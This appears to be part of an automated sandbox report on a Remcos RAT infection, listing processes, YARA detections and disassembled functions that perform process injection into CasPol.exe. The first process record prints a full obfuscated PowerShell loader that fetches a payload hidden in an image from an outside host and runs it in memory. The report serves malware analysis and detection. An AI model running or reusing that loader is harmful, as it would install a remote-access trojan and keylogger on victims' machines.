Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
Imagebase:	0xa00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:23:05
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:23:29
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:	0xd90000
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 06D20FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2095377300.0000000006D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 584c959390527fe76faf378fba2fe1054c4a9e4e398bcdefa3cafd6d8eb5a651
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06D20FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2095377300.0000000006D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 584c959390527fe76faf378fba2fe1054c4a9e4e398bcdefa3cafd6d8eb5a651
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 4824, Parent PID: 1436COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	74
Total number of Limit Nodes:	9

Executed Functions

Function 02B47A18 Relevance: 1.9, APIs: 1, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2201166912.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67c3f2cb780601700ed319e38b00e4d498532249cfeaaa9c4d06c54309e9afa
Instruction ID: f17d5f9fef6cd94aada478a04494b4dff02c12296ce0b1e33c88d31c682ee7a2
Opcode Fuzzy Hash: c67c3f2cb780601700ed319e38b00e4d498532249cfeaaa9c4d06c54309e9afa
Instruction Fuzzy Hash: 06E10A75A01219EFDB05DF98D984A9EFBB2FF88310F248159E815AB351CB31ED81DB90

Function 02B41BA1 Relevance: 1.6, APIs: 1, Instructions: 144
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 02B47E99

Memory Dump Source

Source File: 00000003.00000002.2201166912.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b40000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 3ee8f9444b5e65a6800b52a50974372047370d09ea0233f9753b7e758727552e
Instruction ID: 4126916c1c2ef56f44cb2e16259b6e2fec145472dbe4412e0d003cff0e4cdea6
Opcode Fuzzy Hash: 3ee8f9444b5e65a6800b52a50974372047370d09ea0233f9753b7e758727552e
Instruction Fuzzy Hash: 3341E1B2C097899FCB01CFACD8846DEBFB4FB4A300F14819AD458AB212C7349944DBA1

Function 07211F40 Relevance: .6, Instructions: 582
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c7b97f31a0d2d1e4009f805c51b2aae4f5aa2b4d1e7e24668da961dd4b6a6c
Instruction ID: 1ad398bcc1b53b0d58b21d8cbe61d1f8395dd81975460283964a9f6e6fbad736
Opcode Fuzzy Hash: 32c7b97f31a0d2d1e4009f805c51b2aae4f5aa2b4d1e7e24668da961dd4b6a6c
Instruction Fuzzy Hash: EA123CB1714307DFDB158B68C81076BBBE2BFE6211F1480BAE945DB291DB72C842C7A1

Function 07214610 Relevance: .4, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef39a2e8cfefe8722ab30cca7e852b2a11536677770a2631cf2c44e28c8c496
Instruction ID: c9f9f6503287bac0d15bc2cb6dc66630a05470387ad11f722ef4611384543e18
Opcode Fuzzy Hash: 5ef39a2e8cfefe8722ab30cca7e852b2a11536677770a2631cf2c44e28c8c496
Instruction Fuzzy Hash: 23F116B1B102469FDB14AF68C410B6ABBF2FBD9710F258469E9099B340DB72DD41CB91

Function 072145F3 Relevance: .2, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37e3173424c25f2b2f3b537b152b17ad6ebf3dd9b5096a456a87c053d38ca2b
Instruction ID: c72f7a841b1489b80eb57044e321fecf45bf6a4003229c6a57e545e353c6951e
Opcode Fuzzy Hash: a37e3173424c25f2b2f3b537b152b17ad6ebf3dd9b5096a456a87c053d38ca2b
Instruction Fuzzy Hash: 6F91F5F0B202869FCB14EF54C450B69B7F2FB99710F258169E909AB344DB72ED41CB91

Function 072145AB Relevance: .2, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50cb59ea0af56ab5f8c9b5447640342fc8e3cccb4667b86d117559b09a094c5c
Instruction ID: ed0a2ad3edaf8cc91f40368c1cea9ace7043ad34c6e89bf7b2093f67a18d30bb
Opcode Fuzzy Hash: 50cb59ea0af56ab5f8c9b5447640342fc8e3cccb4667b86d117559b09a094c5c
Instruction Fuzzy Hash: 3291F6F0B202869FCB18AF58C450B69B7F2FB95710F258569D919AF344CB72EC41CB91

Function 07211F26 Relevance: .1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750f32b250876718afe715aa9b22ebb8f56e3e45cea27256b3e736aa01cc8894
Instruction ID: 6e13665d6218ba086cd42cd5f52d8ac8b15b85dc9c28c1664d408880e9d292e3
Opcode Fuzzy Hash: 750f32b250876718afe715aa9b22ebb8f56e3e45cea27256b3e736aa01cc8894
Instruction Fuzzy Hash: 1E41C7F0B24307DFCB20CF14894076A7BE2BFA5211B5681A5EB04EB292D736D985CB65

Function 072105F0 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae4050dcbd90d78bf04c4adfe5264f057a97afc327dbfa4ce842927092d4890
Instruction ID: 64afaef2a6ab694416d5ba582f5b12924cf27b1992eec729296ccb88f5dcff21
Opcode Fuzzy Hash: dae4050dcbd90d78bf04c4adfe5264f057a97afc327dbfa4ce842927092d4890
Instruction Fuzzy Hash: 271159B13103156BEB245B698810B7BB7D6ABD4720F20842EE949DB3C0D972DC818796

Function 072105EA Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caefb6366f4475076e4d3aeaa289ae4953523d67c193a31b55fe97203a0b1881
Instruction ID: ea9769fcbd4293f8594bc27e8cbbd2aaddae501680cfb969a97cd85200761ae0
Opcode Fuzzy Hash: caefb6366f4475076e4d3aeaa289ae4953523d67c193a31b55fe97203a0b1881
Instruction Fuzzy Hash: 1C0176F030034527EA305B6A9810B6B7AD7AFC1724F60C429F948EB3C0D9B5EC8087A6

Function 02ADD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2200979048.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2add000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6064f0e99f16cee1bc617c9a10fbd20df06c63481639c686d719fb153be03d68
Instruction ID: 0e7c48c74617c3b2da5bfa126768bf5576f93c7080937fb4ed54c4c5862f4651
Opcode Fuzzy Hash: 6064f0e99f16cee1bc617c9a10fbd20df06c63481639c686d719fb153be03d68
Instruction Fuzzy Hash: 8C01F772405704AAE7205F15CDC4B67BF98DF81324F58856ADD0B1A142CB789846C6B1

Function 02ADD005 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2200979048.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2add000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1334991beadeaa330f9ac511cc24312992a0a344e67c0ff8b3b9b079ec5563
Instruction ID: 96e21ba3422375f62f8a300d958f9c8669626a912e5bb850f341527c40997808
Opcode Fuzzy Hash: 6c1334991beadeaa330f9ac511cc24312992a0a344e67c0ff8b3b9b079ec5563
Instruction Fuzzy Hash: 9D01806200E3C45FD7128B258C94B52BFB4DF42224F19C1DBD8898F193C2695849C772

Analysis Process: powershell.exePID: 2704, Parent PID: 1776COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	88.5%
Total number of Nodes:	26
Total number of Limit Nodes:	1

Executed Functions

Function 02E487B0 Relevance: 6.7, APIs: 4, Instructions: 663
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 02E48A6A
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 02E48B0C

Part of subcall function 02E47314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4

ResumeThread.KERNELBASE(?), ref: 02E48D8F
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02E490F4

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 18adfcbd63f171658df6ec5e8af23afc3221f6bc2d2be2e649a480cf2b58dd85
Instruction ID: 8db51b3e1ea7e71b5d9ca5fc0d9c27c1fff20c1a10d713d065be091ef9bc2ca2
Opcode Fuzzy Hash: 18adfcbd63f171658df6ec5e8af23afc3221f6bc2d2be2e649a480cf2b58dd85
Instruction Fuzzy Hash: 43427C70A00219CFEB64DF69DC50BAEB7B2AF84308F14C1A9D909AB290DF759D85CF51

Function 02E47FCD Relevance: .6, Instructions: 626
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c992183dd78bebdd50188408a952df775eb5d5bb5f70ab3e8b830dbe60a7e39e
Instruction ID: 91a81452e10c047102b27e7a6ce3cda09616d2f560478a54e85632e1b6c96599
Opcode Fuzzy Hash: c992183dd78bebdd50188408a952df775eb5d5bb5f70ab3e8b830dbe60a7e39e
Instruction Fuzzy Hash: 65916D34F44218CBDB48DB74A8547BE7BA3BBC4700F19C56AE546E7384CE389C528B95

Function 02E472F0 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02E490F4

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 777690d1a011868e854cc9da45fa23fe91a48658b19e41d56f5b46992883cfe0
Instruction ID: 356590534c5fcced9a89475e65eefd29b0f51d7108cd607bd2c0d8a719d6b02c
Opcode Fuzzy Hash: 777690d1a011868e854cc9da45fa23fe91a48658b19e41d56f5b46992883cfe0
Instruction Fuzzy Hash: 38511A7190121ADFDB24CF99D944BDEBBB5BF48304F0185AAE909B7240DB759A84CFA0

Function 02E49360 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 176c87b59f0fc026bf6a8fd1f2ebec40661cd042f0e91ef937e873e22074569e
Instruction ID: 275d73e48ced51963442539c3d0a9cbbfc0719ae000add76dc2c61d7ae5ecf07
Opcode Fuzzy Hash: 176c87b59f0fc026bf6a8fd1f2ebec40661cd042f0e91ef937e873e22074569e
Instruction Fuzzy Hash: 032125B19003499FDB10CFAAD884BDEBBF8FB09324F50842AE518B7241D378A544CFA1

Function 02E47314 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5bcf24d192cc85eec2db461be8a5c2eb339bcc05b10af25324b2ea8b7037dd07
Instruction ID: a15ebe891ea4b763ddee95ea1ce89dfb0859b5c835399a90de1097b8d2b1f394
Opcode Fuzzy Hash: 5bcf24d192cc85eec2db461be8a5c2eb339bcc05b10af25324b2ea8b7037dd07
Instruction Fuzzy Hash: AF2109B1900309DFDB10DF99D985BDEBBF4FB49314F508429E514B7241D3789944CBA4

Function 02E472FC Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0059bc607035cce4230a5df939adc57d823be46898a6139e85538b080d45b70d
Instruction ID: 9cae3168a90299963327b5793d0e8f73aba3b86f22c0325e309128b900fbd87b
Opcode Fuzzy Hash: 0059bc607035cce4230a5df939adc57d823be46898a6139e85538b080d45b70d
Instruction Fuzzy Hash: 561144B19002098FCB10CFAAE844BDFBBF4EB88224F158029E818B3201D778A545CFA4

Function 02E47320 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d3bca6eed7b671d4faeb029823ab8dedf610cba56ffe13294f3765607b6a781f
Instruction ID: c73b29091e822b9831f3a6dae8a302e1aebf4d0afbf4a6c109c68abd1c892ab9
Opcode Fuzzy Hash: d3bca6eed7b671d4faeb029823ab8dedf610cba56ffe13294f3765607b6a781f
Instruction Fuzzy Hash: 291126B1D007098FDB10DFAAD845BDFBBF4EB88224F158069E818B3241D778A545CFA5

Function 02E491E8 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B

Memory Dump Source

Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 734d244ac6da1ad56fb3a35c477d1e358ada9a6cb96ed8599e21b45cad4819a5
Instruction ID: 00b9d646fd17800bb9815e32672245019039866ab44ff6e5ed4ba2e7e58086b7
Opcode Fuzzy Hash: 734d244ac6da1ad56fb3a35c477d1e358ada9a6cb96ed8599e21b45cad4819a5
Instruction Fuzzy Hash: BB1147B1C002498FDB20CFAAD444BDEFBF5EB88224F148529D458B3201D7789545CFA5

Function 07601F18 Relevance: .5, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed6970b497302cfdc469c5bbc7635d58b3369f171c1aa6ce3055f875b5d2970
Instruction ID: 1e6cbbfb28560705f52550efd162197776a7df5a5dd760aafc02baffd7a20a2c
Opcode Fuzzy Hash: 7ed6970b497302cfdc469c5bbc7635d58b3369f171c1aa6ce3055f875b5d2970
Instruction Fuzzy Hash: A4F1E4B1B0420ADFDB1D9F74D8687ABBBA1BF85310F1480AAD6568B391DB31C846C7D1

Function 076013A0 Relevance: .4, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb19c4d98a6ef9b2db90c6401d805a3a9c8c47e86905972bce8eb50335f7d20
Instruction ID: 3dd42fdf92b5d851db40bad284055ba8e1ebb1327d59505437f7b7fd8b81e0df
Opcode Fuzzy Hash: feb19c4d98a6ef9b2db90c6401d805a3a9c8c47e86905972bce8eb50335f7d20
Instruction Fuzzy Hash: E8B1D7B570420A9BDB2E4F79981066FBBA6AB83711F18807BD5078B3D1DA31C945C7E1

Function 076000F0 Relevance: .3, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e583634d0f2af5249c8d075c5f489d37ad51e315b27a6a3c3a8445c1c51ff499
Instruction ID: 13c2978589d53fb7a73a5d5af3ba6c329ef6b6d232d043f6953dbe6e1e1d9490
Opcode Fuzzy Hash: e583634d0f2af5249c8d075c5f489d37ad51e315b27a6a3c3a8445c1c51ff499
Instruction Fuzzy Hash: C5A1B2B1B04206DFDB2D9FB9D4507ABB7A2AF89210F14807AD5468B381EB71C946C7D1

Function 076009E5 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92d0e677777fe941a93d65711025958801772f09aabcc4bd1ebdc23eb58c616
Instruction ID: 6306a2642a695df0dbf21584ed8ddd3ae9bca4a7ee843afc47fd9a0966a433c3
Opcode Fuzzy Hash: c92d0e677777fe941a93d65711025958801772f09aabcc4bd1ebdc23eb58c616
Instruction Fuzzy Hash: 584104B171420B9FDB2C4A7598203BBB391AB91214F24807AD517CB7D2EF76C951C7E2

Function 07601381 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf6bf98b3902852af9a5fe9282fa802325d611c74366045124720f3aab1b88a
Instruction ID: 5a94d71518a661188c4860e25432798b07667bc4e0dac12e3c4b8ab61c4f1ab6
Opcode Fuzzy Hash: abf6bf98b3902852af9a5fe9282fa802325d611c74366045124720f3aab1b88a
Instruction Fuzzy Hash: 1631A6B160434EDFCB2E8F28C54166B7BA1EF43710F1941A6D8168B2E2E735C94AC7D2

